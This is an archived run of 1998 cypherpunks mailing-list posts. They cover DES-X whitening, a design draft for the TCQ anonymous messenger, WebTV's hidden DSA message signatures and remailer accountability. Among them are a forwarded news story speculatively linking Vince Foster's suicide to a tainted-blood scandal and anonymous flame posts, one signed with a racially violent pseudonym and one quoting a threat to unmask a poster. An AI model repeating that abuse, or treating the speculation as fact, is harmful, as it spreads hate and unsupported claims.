where P is plaintext, C is ciphertext, and DES (K, P) is the DES
encryption of P under key K.

The encryption then has three steps:

	- XOR the input with K3
	- DES encrypt that with K2
	- XOR the result with K1

The first and last steps are called "whitening" because by xoring with
a random value, any structure is destroyed.  White light is a uniform
and unstructured mixture of all colors.

Whitening has been adopted as a general tool in constructing ciphers
these days and many of the AES candidates use it.  It makes things more
difficult for the cryptanalyst as he won't know exactly what values are
being fed into the guts of the cipher.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Date: Sun, 11 Oct 1998 13:15:10 +0800
To: cypherpunks@Algebra.COM
Subject: Bloodgate
Message-ID: <199810110455.BAA17730@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



Vince Foster suicide linked to Arkansas tainted plasma sales

Mark Kennedy
The Ottawa Citizen

The controversy over how a U.S. firm collected tainted blood from
Arkansas prison inmates and shipped it to Canada has spread to Vince
Foster -- U.S. President Bill Clinton's personal confidant who committed
suicide in 1993. 


Mr. Foster, a boyhood friend of Mr. Clinton's, was one of the president's
most trusted advisers. As a corporate lawyer in Arkansas, he worked in the
same law office as Hillary Rodham Clinton and became a close colleague of
hers. 

When Mr. Clinton left Arkansas for the White House in early 1993, he
called on Mr. Foster -- known as an earnest individual with high ethical
standards -- to join him as deputy White House counsel. Mr. Foster
obliged, also remaining the Clintons' personal lawyer. Now, five years after
his mysterious death, two developments have prompted questions about
Mr. Foster's knowledge of the U.S. company's prison-blood collection
scheme: 

  - There are signs that Mr. Foster tried to protect the company called Health
    Management Associates (HMA) more than a decade ago in a lawsuit. 

  - And a major U.S. daily newspaper recently reported that Mr. Foster may
    have been worried about the tainted-blood scandal, which was just
    emerging as a contentious issue in Canada, when he killed himself in July
    1993. 

Mr. Clinton was governor of Arkansas when the Canadian blood supply
was contaminated in the early and mid-1980s. He was familiar with the
operations of the now-defunct HMA, the Arkansas firm given a contract by
Mr. Clinton's state administration to provide medical care to prisoners. In
the process, HMA was also permitted by the state to collect prisoners'
blood and sell it elsewhere. 

HMA's president in the mid-1980s, Leonard Dunn, was a friend of Mr.
Clinton's and a political ally. Later, Mr. Dunn was a Clinton appointee to
the Arkansas Industrial Development Commission and he was among the
senior members of Mr. Clinton's 1990 gubernatorial re-election team. 

The contaminated prisoners' plasma -- used to create special blood
products for hemophiliacs -- is believed to have been infected with HIV, the
virus that causes AIDS. As well, it's likely the plasma was contaminated
with hepatitis C. 

Any information linking Mr. Foster to HMA and its blood program is bound
to raise more questions about how much Mr. Clinton knew. 

Michael Galster, a medical practitioner who did contract work for the
prison system, has revealed to the Citizen that Mr. Foster once approached
him in the mid 1980s to ask for a favour. 

At the time, Mr. Clinton's administration and HMA were facing a
$12-million lawsuit from a prisoner whose infected leg had been amputated
at the hip in 1982. 

The inmate was claiming that poor medical care by an HMA doctor -- who
had been working in the prison despite being denied a permanent licence to
practice by the state medical board -- had resulted in the needless
amputation. 

Mr. Galster, an expert in prosthetics, says HMA's medical director had
asked him to build a special artificial leg for the prisoner in the hope that it
would lead to an out-of-court settlement. Mr. Galster refused to get
involved, and was visited several weeks later at his office by Mr. Foster,
who appealed again for his assistance. 

"The purpose of his being there was to convince me to take this, smooth it
over and everybody would be happy," says Mr. Galster, who has written a
fictionalized account of the prison-blood collection saga, called Blood Trail. 

"I refused him. He said, 'I understand your predicament, but this could
make it difficult for you to get a future state contract.' 

"If it's like the past state contracts I've had, I don't need any," Mr. Galster
says he replied. "He (Foster) kind of laughed and said 'OK, I appreciate
your time.' " 

It was the only time the two met, but Mr. Galster now says he believes Mr.
Foster was trying to protect both Mr. Clinton and HMA from public
embarrassment. 

The questions surrounding Mr. Foster became even more intriguing when,
several days ago, the New York Post published an article entitled "The
tainted blood mystery" by one of its columnists, Maggie Gallagher. She
reported on how the Citizen had broken a lengthy story in mid-September
about the Arkansas prison-blood scheme. 

Most significantly, Ms. Gallagher wrote that the story suddenly cast new
meaning upon "a strange little memory fragment" that had been "meaningless
in itself." 

Citing a source who asked not to be identified, Ms. Gallagher reported that
a day or two after Mr. Foster died on July 20, 1993, someone called a
little-known phone number at the White House counsel's office where Mr.
Foster had worked. 

"The man said he had some information that might be important," wrote Ms.
Gallagher. "Something had upset Vince Foster greatly just days before he
died. Something about 'tainted blood' that both Vince Foster and President
Clinton knew about, this man said." 

Mr. Foster's mysterious death spawned a political controversy from the
moment that police, responding to an anonymous 911 caller, found his body
in a national park in Washington, D.C. 

Police concluded that Mr. Foster had stood there coatless in the
late-afternoon heat, inserted the muzzle of an antique Colt 38. revolver into
his mouth and pulled the trigger. Immediately, conspiracy theorists began
spreading rumours that Mr. Foster had been murdered. But independent
counsel Robert Fiske (a special prosecutor who examined the Whitewater
scandal before being replaced by Kenneth Starr) conducted his own review
and agreed with police that it was suicide. 

It was believed that Mr. Foster had been suffering from depression and was
especially perturbed by a brewing scandal in which he was embroiled. In
the so-called Travelgate fiasco, Clinton aides had fired several veteran
White House travel-office employees as part of an alleged attempt to give
the lucrative travel business to Arkansas cronies. 

However, Ms. Gallagher's column has raised questions over whether Mr.
Foster was distressed about something he knew regarding tainted blood,
and whether this anxiety contributed to his suicide. 

In Canada, the summer of 1993 was a critical period. A Commons
committee, which had conducted a brief review of the tainted blood
scandal, had just released its report in May. Its first recommendation called
for a major "public inquiry" to conduct a "full examination of the events of
the 1980s" when the Canadian blood supply became contaminated with
AIDS. 

Indeed, on Sept. 16 -- eight weeks after Foster's death -- the federal
government announced the public inquiry, to be headed by Justice Horace
Krever. During the course of his work, Justice Krever unearthed the
Arkansas prison-blood collection scheme and wrote about it in his final
report last year. 

However, no mention was made of Mr. Clinton until last month's story in
the Citizen, which drew on documents obtained from Arkansas State Police
files. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Sun, 11 Oct 1998 09:27:43 +0800
To: cypherpunks@cyberpass.net
Subject: "TCQ" (request for comments)
Message-ID: <36200581.C18BC73C@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Some people asked for more detail on the project I am working on, so I
have begun a quick write-up about it. A draft version is at the URL
below. This is just a sketch, and the document is fairly scrappy still,
but I thought it would be worth asking for comments at this stage
anyway. So, flame away.

   http://www.brd.ie/papers/tcq.pdf

(Yes, it's an acrobat doc. Apologies for the somewhat awkward format
here.)

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 11 Oct 1998 08:47:43 +0800
To: cypherpunks@cyberpass.net
Subject: Re: none
In-Reply-To: <cb4338e515c87edd@hr13.zedz.net>
Message-ID: <199810110030.CAA18370@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



  > PS. there is someone on this list who knows who i am.
  > yes there is someone who knows who anon posters are.

Damn straight!

There's anon over there behind the larch,
trying not to be seen.

Or do you mean anon in the filing cabinet
(she's trying not to be seen, either).

-- KillTheBlacksMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 11 Oct 1998 08:47:39 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199810110030.CAA18407@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Sunday, October 11, 1998 - 01:11:20 MET

It's messages like this which make the cypherpunk mailing list more bearable... NOT :- )


-> Subject: N/A
-> Date: Sat, 10 Oct 1998 22:18:31 +0200
-> From: Anonymous <remailer@hr13.zedz.net>
-> To: cypherpunks@cyberpass.net

-> PS. there is someone on this list who knows who i am. yes there is someone who knows who anon
-> posters are. we fucking hate you and am waiting for you to take the trap and we will reveal your identity scumbag.

- Scumbag
Interesting terminology... :- ) I got this nifty little slang dictionary which has this word in it...
"Dictionary of Contemporary Slang" by Tony Thorne... ISBN 1-85980-003-3 [on the back of the dic] and it's worth 12.99 in 
British pounds :- ) Published in 1994
Copyright (c) Tony Thorne 1990
The moral right of author has been asserted
A CIP entry for this book is available from the British Library
Printed in Britain by Clays Ltd, St. Ives plc
ISBN 0 7475 1735 5 [on the second page]

Comments on back of book: More than 5,000 racy and raffish colloquial expressions - from Britain, America, the Caribbean, 
and other English-speaking places.
'Fascinating. Certainty a book I shall want to keep on trucking with.' Daily Mail
'Wonderfully informative.' Observer
------------------------------------
Definition of 'fucking': adjective
an intensifier used with other adjectives to emphasis. Like "bloody" it is also one of the very few examples of an 'infix' [a word 
component inserted before the stressed syllable in the middle of a polysyllabic word] in English.
    e.g. 'Jesus, it's f****** cold in here.'
    e.g. 'Abso-fucking-lutely.'

Definition of 'scumbag': noun, [origin] American
a deceptive person. This term of abuse is now widespread and is permitted in the broadcast media, in spite of the fact that its 
origin, unknown to many of its users, is as an obscene phemism for condom, 'scum' being an obsolescent American term for 
semen. The word was adopted by British speakers around 1985.
    e.g.. 'Even scumbags have right here in the USA.' [Red Heat, US film 1988]

Oo and a bottle of rum,
Anonymous

PS: If I remember correctly, the main actors in Red Head were James Belushi, and Arnold Swatznager [something like that]....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 11 Oct 1998 10:54:13 +0800
To: fod@brd.ie
Subject: TCQ ascii version
Message-ID: <199810110234.EAA29043@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



(c) 1998 Frank O'Dwyer. Verbatim copying and redistribution in any
medium is permitted provided this copyright notice is preserved on all
copies.

			TCQ ("They Seek You")
		     Mass-market Strong Anonymity
			   Frank O'Dwyer
                            fod@brd.ie
Introduction

This document sketches the design goals and features of "TCQ", a work
in progress with the aim of providing a mix of features offered by
ICQ, IRC and email -- but using cryptography to provide strong
anonymity and privacy. As the name implies, TCQ "(They Seek You") is
similar in purpose to ICQ ("I Seek You"), but with a very different
emphasis. TCQ is motivated by the recognition that people being sought
do not always wish to be found, and that those doing the seeking
(people, organisations, or governments) can be threatening. TCQ is
also motivated by a desire to make the use of strong anonymity easier
and much more common, riding the current wave of popularity of
"anonymous" services like IRC, ICQ and webmail.

Status

TCQ is in the early stages of being designed and prototyped; this
early draft is being made available now to solicit comments (and
assistance) from anyone with an interest in this project.  Some
initial design decisions and the rationale for them are also
documented here. It is planned to make TCQ freely available in source
and binary form, under a liberal licence (such as MozPL, or a
BSD-style licence). If you can contribute ideas, or code on those
terms, you are welcome to.

Background

Basic political background to this, intended for general consumption
(including people who may not be aware of what GAK is, etc.). This is
just a sketch. - FOD

Anonymous communication is hugely popular. Vast numbers of
non-technical people use services such as ICQ (www.mirabilis.com) and
Hotmail (www.hotmail.com) because they want to communicate privately
and anonymously. However, these systems only offer a weak form of
privacy and anonymity. They use unencrypted links (which can easily be
tapped), unencrypted messages on centralised servers (which can easily
be commandeered or shut down) and well known sites (to which access
can easily be blocked). They also use communication links that can be
traced to individuals, albeit requiring some effort.

Systems which offer much better privacy and anonymity are available
(for example PGP, Cypherpunks remailers), but relatively few people
use those systems. This is partly because relatively few people know
about them, but mainly because they are difficult to use. There is a
lot of additional theory on strongly anonymous and strongly private
communications [ref Cypherpunks literature here], but few
implementations of any sort and no mass-market implementations. (that
I am aware of - FOD).

In the case of strong anonymity, most services thus far have been
based on email. Email has a strong culture of being suspicious of
"fake names", and this is another factor in the lack of mainstream
take-up of strong anonymity. However, with services such as IRC and
ICQ, "fake names" are the norm -- these cultures are now becoming
mainstream and they may be more receptive to strong anonymity.

At the same time, an individual's ability to communicate with true
privacy and anonymity is under threat from various quarters, including
for example:

o Government Access to Keys. Proposals designed to allow governmental
access to private communications, (including encrypted private
communications between individuals) have been circulating for some
time in many jurisdictions including the United States and Europe.
These proposals are typically sold on the back of "hard cases", such
as a claimed need for law enforcement to be able to intercept the
communications of paedophiles and terrorists.

o Physical border inspections. Users who cross borders may be subject
to customs inspection of any computer equipment they may be carrying;
for example, if their laptops contain (or appear to contain) encrypted
information, they may be required to provide the key(s). On the other
hand, if their information is not encrypted, then users' confidential
information (private diaries, letters, business plans) is
exposed. There are rumours that some countries (such as the UK)
already perform such inspections.

o Centralised Services. There is a growing trend to move
security-critical services off users' own PCs and onto the web. Prime
examples include online backup and webmail. Even non-technical people
often instinctively react to this by becoming "anonymous" (e.g. lying
about their names and location). However, this is still a very
hospitable climate for attack by governments and other parties, and in
any case, the level of anonymity is weak. Also, in so far as such
services benefit privacy/anonymity (e.g. webmail), they are easily
monitored, blocked, or shut down.

o Strongly Identifying Protocols. Commercial security products, some
of which apparently offer strong encryption and privacy, are almost
universally based upon "X.509 certificates" and trusted third parties
known as "Certification Authorities" (CAs). This trend is worrying for
a number of reasons:

  o X.509 is typically used as a strongly identifying protocol, and the
  analogy is often made between X.509 certificates and a driving licence
  or passport. Although X.509 can facilitate private communications, it
  effectively prevents anonymous private communications since by design
  it requires you to show your "passport" to strangers.  (X.509 does not
  have to be used this way, but people are often encouraged to use it
  that way.)

  o Use of X.509, and in particular establishment of public CAs, is
  likely to be heavily regulated. Proposals have been made to "licence"
  CAs, for example. Regulated management of individuals' encryption keys
  is not a healthy development for online privacy.

  o Extensions for governmental access to keys have been made to X.509,
  and X.509 is at the heart of some governmental strategies to mandate
  key access.

  o If Public CAs take off then they will turn out to be single points
  of failure and an extremely attractive attack target. Anyone
  (individual, corporation or government) who can compromise a public CA
  is in an excellent position to attack the communications of all users
  served by that CA.

o Logical border inspections. Communications that cross cyberspace
borders may be subject to traffic monitoring and/or filtering. This
might occur at corporate firewalls or at well defined national "entry
points" and "exit points".

o Non-repudiation. Some systems for private communications have as a
side effect that it is difficult for a person to plausibly deny
sending or receiving a particular message. This is sometimes welcome,
but it can be a problem if the person thinks he or she is
anonymous. For example, a warm body might be linked to a message just
by being found in physical possession of related cryptographic keys.

Design goals

These goals are listed to give an idea of the features TCQ is intended
to provide. It is likely that TCQ will meet these goals only in a
piecemeal fashion as it evolves, doing the easy bits first and leaving
the hard bits till later. We will see. -FOD

1. Casual Anonymity. TCQ should offer a messaging service based on
disposable cryptographic identities. This level of anonymity is weak,
but it is easiest to implement and it is a start.

2. Relative Anonymity. It can be useful to have multiple identities
(or "nyms") and for some identities to be less anonymous than
others. A nym might be anonymous, identified to a friend, identified
to a select group, or generally identified to everyone. For example,
this allows for applications where the sender is anonymous but the
receiver is not. TCQ should allow people to selectively reveal their
identities (including partial information about themselves) while
remaining fully anonymous to others. TCQ should also allow multiple
identities to be maintained, with varying degrees of anonymity, and
allow these identities to be kept at arm's length from each
other. Lastly, it should be possible for a TCQ sender to selectively
reveal "also known as" relationships between one nym and
another. (lots of requirements here -- might be worth splitting this
up).

3. Strong Anonymity. TCQ should be extensible to use, or natively
offer, stronger anonymity services (mixes, remailer-type
functionality, etc.).

4. Privacy. It should not be possible for unintended recipients to
read TCQ messages (but see the caveats below).

5. Integrity. It should not be possible for a third party to tamper
with TCQ messages. (again see the caveats below.)

6. Repudiability. It should be possible to plausibly deny having sent
a TCQ message, or at least know when this will not be the case.

7. Ease of use.

   o TCQ should be easy to install and use for average users of ICQ,
   webmail and IRC, and should not require special cryptographic
   expertise.

   o TCQ should also be easy to use for advanced users, and allow them to
   know what is going on "under the hood".

   o It should be easy for average users to become advanced users, and
   they should be guided to documentation of issues that affect their
   privacy.

   o It should be easy for developers to extend TCQ without being
   intimately acquainted with all of its workings (ideally, it should
   offer well-defined extension points wherever possible).

8. Decentralisation. TCQ should not depend upon well-known centralised
servers, since they are easily monitored and shut down. (This is
unfortunate, since many ICQ-style features are very difficult to
provide without central servers; TCQ may have to piggyback on existing
public resources such as IRC and webmail to provide these.)

9. No Special Resources. TCQ should require only resources that are
available to the average dial-up ISP user. (Users should not be
required to set up a server on the Internet for example, though they
should be able to use any public resources that exist, and private
resources if they have them.)

10. Secure Message Store. TCQ should provide encrypted and tamperproof
storage for received messages, and should provide a feature to
securely erase messages from this store. (It is arguable whether
"securely erase" is always useful -- an attacker will usually be able
to record encrypted messages in transit anyhow. However there may be
draft messages in the store that were never sent anywhere.)

11. Mobility. TCQ users will be typical dial-up users. They will not
necessarily have fixed or easily discovered IP addresses. They may
also change ISPs, move from location to location, or switch
computers. While travelling they may cross borders and potentially
they will be subject to inspections of their computing equipment.

12. Channel Independence. It should be possible to extend TCQ (with
code) so that TCQ messages can be sent over whatever channels and
drop-points are available (e.g. direct connections, email, webmail,
IRC, ICQ, ftp sites, newsgroups, mailing lists, remailers, eternity
services, etc.). Initially it should be possible to use at least IRC,
email and webmail, since these are easiest to implement, most people
have easy access to these, and IRC and webmail are relatively
anonymous to begin with. (The expectation of anonymity is also highest
on these services.) After that, use (and ultimately provision) of
anonymous remailer style services is the natural next step.

13. Programmatic Access. It should be possible for programs (robots)
to send messages via TCQ, and to automatically handle received
messages. Command line and API access, coupled with some form of
scriptability and the ability to call out to scripts to handle,
pre-process or send messages is desirable for this.

14. Group communication. Programs such as IRC and ICQ offer the
ability to have N-way chats. If it is to attract users of these
programs, TCQ needs to offer that too. (This is difficult to do
generically and securely, however.)

15. File Transfer. Messages should not be restricted to text messages,
and messages should not be limited in size.

16. Stealth, firewall negotiation. TCQ should be able to avail of
stealthy channels, and should not make its protocols easy to
firewall. Protocols that are easy to firewall are usually easy to
filter and monitor, and always easy to shut down.

17. Persistent pseudonyms, friend location. With IRC and ICQ, it is
straightforward to determine if a friend is online and communicate
with them again (although this is not done securely). Although it has
no central server, TCQ should allow this in a similarly
straightforward fashion, otherwise few will use it.

18. Key Management Independence. TCQ should not presuppose much more
than the availability of a key pair per pseudonym. This allows
different key management systems to be used, including web-of-trust,
reputation capital systems, manual key exchange etc.

19. No patent problems. TCQ should not require the use of patented
techniques or patented algorithms such as RSA and IDEA, as this would
affect its use in some countries.

20. Sugar. Popular chat clients (e.g. Mirc, Vplaces) provide various
"nice to have" features such as the ability to play sound files during
conversations and the ability to have avatars (graphical
representations of participants). TCQ should provide similar features.

Anonymity and Privacy Caveats

This is just an attempt on my part to work out what is and is not
achievable in terms of privacy and integrity when purely anonymous
participants are involved and relationships are formed wholly online
(i.e. no out-of-band contact or face-to-face meetings). I just wrote
it down here to clarify my own thinking and to capture it
somewhere. Comments on this reasoning are very welcome. - FOD.

Anonymous Receivers

When talking to an anonymous receiver, privacy of communications does
not apply in the usual sense, regardless of how much encryption is
present. This is because an anonymous receiver could be anyone (by
definition). In such a scenario, the sender should assume the worst,
namely that the receiver is not someone the sender wishes to
communicate confidential information to.  For example, the receiver
could be some entity out to determine the sender's identity or exact
location. In addition, the receiver could pass the sender's messages
on to others. Thus, not only could you be talking to anyone, you could
be talking to everyone. In a group where all relationships are
anonymous and formed wholly online, no amount of strong cryptography
or "reputation capital" changes this (see Man in the middle attacks
below). So why bother encrypting to an anonymous receiver? The only
reason seems to be that in an anonymous online relationship, privacy
comes from sender anonymity and sender anonymity might fail. If it
does, then message encryption is a second line of defence against
eavesdroppers but only if the anonymous receiver is trustworthy after
all. There seem to be plenty of threat models in which encryption to
anonymous receivers is worthless.

An example may clarify this: Nym1 wishes to admit some embarrassing
but non-identifying fact about themselves to Nym2. The reason Nym1 is
willing to make the admission is because Nym1 believes itself to be
speaking anonymously, not because it believes it is speaking
privately. After all, Nym2 could be anyone/everyone. However, if
Nym1's anonymity fails somehow, then encrypting to Nym2 can be
beneficial if there is some significant chance that Nym2 is not
revealing Nym1's messages, and Nym2 does not know Nym1 or is otherwise
not an adversary of Nym1. Similarly, if there is a significant chance
that Nym2 does know Nym1, or is an adversary, then encryption to Nym2
is pointless. In both cases, encryption is secondary and anonymity is
the point.

Anonymous Senders

The flip side of the above, from the receiver perspective, is that an
anonymous sender could be anyone. The receiver cannot assume that it
is the only person receiving the sender's messages, even if they are
encrypted. The sender could be broadcasting them. Nor can the receiver
assume that the messages are in any sense "from" any particular
sender, even if integrity protection is applied. They could be from
anyone. It seems at first sight that given a sequence of messages from
the same anonymous sender (same key pair) then each message is from
the same individual, and that reputations can be built based on that
fact. In the wholly-online/wholly-anonymous case, this is not quite
true however (see below).

Man in the middle attacks

In a group based on public keys where all relationships are anonymous
and formed wholly online, all communications within the group are
always subject to (active) man-in-the-middle attacks.  There is a
possible defence against this using scale and publicity, but
approaches such as web-of-trust and reputation capital do not work for
this. This is how it seems to me, anyway, assuming a public key system
is used, and I try to prove it below -- are there techniques other
than public key techniques that do any better? - FOD

This can be proved by informal induction; the first relationship
(between Alice and Bob) is necessarily formed by exchange of naked
public keys. No third party can vouch for the keys; there is no third
party. No reputation capital can attach to the keys; Alice and Bob
have just met for the first time. Since the public keys are naked, an
active attacker can substitute its own keys for those of Alice and Bob
during the key exchange. Thereafter the active attacker can eavesdrop
on the conversation between Alice and Bob, and can also inject,
delete, reorder, delay or modify messages at any time. As further
participants join the population, any new relationships formed can be
similarly attacked. Alice and Bob cannot reliably certify any new
participants since they can both be impersonated, and in any case, by
definition they do not know any new anonymous participants and can
certify nothing about them. For the same reason, new participants
cannot certify Alice and Bob either. Therefore, in principle at least,
the attacker can impersonate or eavesdrop on any member of the
population, no matter how large the population grows and no matter how
many messages are exchanged. Such an elaborate spoof is arguably not
feasible once some size of population is reached, but this is not
terrifically comforting. (Publicity on out-of-band channels
(e.g. face-to-face meetings) could be used to make these systems more
reliable, but these are excluded by construction -- relationships are
formed wholly online).  Reputation capital does not help, since it
does not matter how much capital Alice accrues if she can be
impersonated. The attacker can damage or abuse Alice's reputation at
any time, for example by injecting or modifying a message and making
it appear to come from Alice. What reputation capital can do, however,
is eventually defeat an attacker who for some reason is only able to
attack some of Alice's exchanges. In that case, Alice will appear to
have two public keys, one real and one fake (supplied by the
attacker). It is then up to Alice to boost the reputation of the real
key and damage that of the fake (assuming she gets to know of it).

Initial Design Decisions

This is still very incomplete, just a few notes for now - FOD

Programming Language, Platform

o TCQ will be implemented in Java/Swing, targeting Java 1.1/1.2 and
Windows initially.  Rationale: Java code is mobile and can be
digitally signed, which leaves room for the entire TCQ program and its
data to be dumped to cyberspace while travelling, and picked up
securely upon arrival (even on a different computer). Thus a mobile
TCQ user could cross borders with nothing more than a signature
verification key and a memorised passphrase, and still restore a
secure environment in the new location. Java is also cross-platform,
so although most people use Windows a relatively easy port to other
platforms (e.g., Macintosh, UNIX) should be possible, and developers
using other platforms can provide extensions without much in the way
of special tools. It is possible to call out to scripts from Java, and
Java can be driven by script (e.g. TCL script, or E (?)). Java also
has good support for cryptography, and an internationally available
crypto library (Cryptix).

Some problems with Java are that certain aspects of it are difficult
to secure, and Java GUIs are frustrating to port in practice. Secure
random number generation and protection of sensitive information such
as keys are hard problems in Java. However, these problems are not
significantly easier in other languages, and the GUI port is much more
difficult. If necessary native code could be used to provide any
features Java can't handle.

Generic Delivery Channels

o TCQ should presuppose only generic delivery channels for messages,
allowing new delivery channels to be added easily.

Rationale: To be usable over as many concrete delivery channels as
possible (IRC, sockets, webmail, ftp sites, remailers, etc. -- see
above), TCQ should not assume too much about the channel. In
particular this means that security features should be applied to the
messages themselves, not the channels. If channels can be assumed
insecure, then people adding code for new delivery channels do not
need to implement any security features unless it is to strengthen
anonymity.

Some properties that TCQ will need to know about each channel type are:

o Whether it is offline or online. That is, with some channels the
other party will be present at that moment and the communication can
be real-time. This is important mainly because on an online channel an
ephemeral key exchange can take place in order to establish perfect
forward secrecy for that particular conversation. A second set of
temporary keys can also be established while online, for later use in
offline communications. For communication that takes place entirely
offline, one-sided ephemeral key exchanges could be used as a form of
key change (this would allow the related nym to persist across key
changes and also improve forward secrecy.) Whether a channel is on or
offline can be modelled as just binary (on/offline) or alternatively
as some estimate of the channel lag.

o Its anonymity characteristics. Some channel types will be more
identifying than others. For example, a direct socket channel is
relatively traceable, whereas a channel through a remailer-type
network is much harder to trace. Channels via drop-points such as
public news groups are somewhere in the middle, but nearer the
"traceable" end of the spectrum.  Message Format

o TCQ messages will consist of an XML header and a MIME-typed content.
Rationale: (This is all based on more of a hunch than a firm
conviction.) XML is readable, easy to extend and easy to process with
scripting languages. It's a nice framework for prototyping protocols,
and unrecognised detail can easily be skipped. There are also
canonical formats for XML, which lend themselves to hashing, digital
signature, etc. It's good for assertions (certificates, RDF
possibilities, W3C digsig?) too. There's also a pretty simple mapping
from protocols such as SPKI and SDSI to XML, if necessary.

MIME is a well-established standard for messaging and content
identification, and the Java Activation Framework uses it for
drag-and-drop, etc.

Something like S/MIME or PGP/MIME could be used instead of XML+MIME,
but these do not work so well in the online case and S/MIME uses
X.509. In any case, these formats can still be used if desired, since
they can be embedded as MIME-types in the body of a TCQ message.

Generic "Friend Location"

o TCQ should presuppose only generic methods of locating friends.
Rationale: locating friends (i.e. finding if they are online,
determining their current IP address or preferred drop-point) is
difficult to do without a central server network. One approach is to
piggyback on some server network that already exists, such as an IRC
or ICQ network, or netphone directories. For example if two people log
onto an IRC network using one of a set of prearranged handles, they
can readily determine each other's online status and IP address.

Another approach is to post a current IP address in a prearranged
location, such as a web or FTP site. There are also some proposals for
"dynamic DNS" which could be useful, since this is a general problem
for mobile IP. Yet another approach is for the requirement to have no
servers to be relaxed to the extent of allowing "nym servers" to be
used just for the purposes of resolving previously exchanged nonces to
current IP addresses, current drop-points, etc. Such servers could
also double as drop-points themselves or as the basis of a remailer
network, if there were enough of them. A variation on the last
approach is to have sets of users collaborating to provide location
services and message forwarding services for one another. This is
probably the most interesting approach, but it is also the most
difficult, it is vulnerable to disruption, and firewalls are a
problem. By using a generic approach, simple initial solutions can be
replaced with other solutions later.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@base.xs4all.nl>
Date: Sun, 11 Oct 1998 13:46:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A Scud in California!
In-Reply-To: <Pine.BSI.3.95.981008202424.17213B-100000@kizmiaz.dis.org>
Message-ID: <ea7ae95c8c1271b1d76af9a1fac1d4df@base.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



>>>>> William Knowles <erehwon@kizmiaz.dis.org> writes:

  >> From another one of the several lists I'm on, I figured someone
  > might know who the new pseudo-proud owner of a fully-operational
  > SS-1C Scud missle *WITH* moblie launcher is...

No shit, Batman -- especially seeing as TCM already discussed it on
this list over a week ago...

-- ScudMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Sun, 11 Oct 1998 22:55:19 +0800
To: cypherpunks@cyberpass.net
Subject: Hidden WebTV signatures
Message-ID: <90811614423763@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



For those of you who don't read sci.crypt, Robert Ames <gnome@istar.ca> has 
posted an article in which he observes that all WebTV posts contain an 
X-WebTV-Signature: line containing base64-encoded data.  For samples of 
WebTV-generated posts, try the alt.weemba newsgroup, which is filled with 
WebTV-user drool (caution: remember to employ protection when exposting your 
mind to the content of the messages).  Some samples:
 
X-WebTV-Signature: 1
        ETAsAhQDqtur/jfleJ2CDOnNrVoeyALEQAIUOQyCBbzjx5HHfxeMERDgCjztXOU= 
X-WebTV-Signature: 1
        ETAtAhUAmCCzQt+Tqt6fNX+L9+gDCECaqQkCFA0YCPz5tk85mUgq7iX/u4vWvOgG 
 
These decode into ASN.1-encoded DSA signatures, eg:
 
   1 30   45: SEQUENCE {
   3 02   21:   INTEGER
            :     00 98 20 B3 42 DF 93 AA DE 9F 35 7F 8B F7 E8 03
            :     08 40 9A A9 09
  26 02   20:   INTEGER
            :     0D 18 08 FC F9 B6 4F 39 99 48 2A EE 25 FF BB 8B
            :     D6 BC E8 06
            :   }
 
for the second one.  The key isn't included in the header, presumably the 
@webtv.net address can be tied to the hardware which contains some hardcoded 
DSA key.  I wonder if WebTV users know they're signing each message they send?
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 12 Oct 1998 01:12:25 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Hidden WebTV signatures
Message-ID: <199810111635.MAA06347@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
   >
   >   I wonder if WebTV users know they're signing each message they send?

Of course they don't. 8*(

How about email? If they Usenet-post via replay?
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Mon, 12 Oct 1998 02:12:14 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Hidden WebTV signatures
Message-ID: <3.0.3.32.19981011134922.03d645e4@rboc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 03:29 AM 10/12/98, Peter Gutmann wrote:

I have experimented with an X-signature line for "remailing" messages.  I
was recently trying this with the dragoncon.net service.

Cracker is a traditional Cypherpunk remailer.  Properly used, messages from
Cracker are not traceable even to governments.  Cracker generates enough
complaints to be bothersome.  Redneck, the nymserver, on the other hand
produces almost no complaints.  I perceive the different on the user's side
as being accountability and the use of a persistent identity.  On the
recipients side, the issue is retribution.  There are people who receive
anonymous messages who simply want retribution.  Cracker does not allow
this retribution to the user (so they pick on me:).  Redneck does allow
retribution.  http://anon.efga.org

Cracker and Redneck are "special" in that under no circumstances are logs
kept, messages traced, or any attempt done to track users.  So I started a
variation of a nym service at another domain, http://www.dragoncon.net

Based on comments from recipients and users of anonymous messages, I kept
two requirements

 * No user based encryption required
 * Retribution against the user is available

There is/was a back door in that while all messages go out with an X-IP
header, this is "lost" if the user originally registered with a first name
of "Anonymous".  I will not claim this is as secure as Cracker or Redneck,
but the service does fit the needs of many people.

I wanted to keep my original requirements in mind and allow messages to be
sent  "From: Anonymous" such as a cypherpunk remailer does.  In an effort
retain my requirement of recipient retribution, I experimented with the
idea of adding an X-Signature header which verifies the messages and the
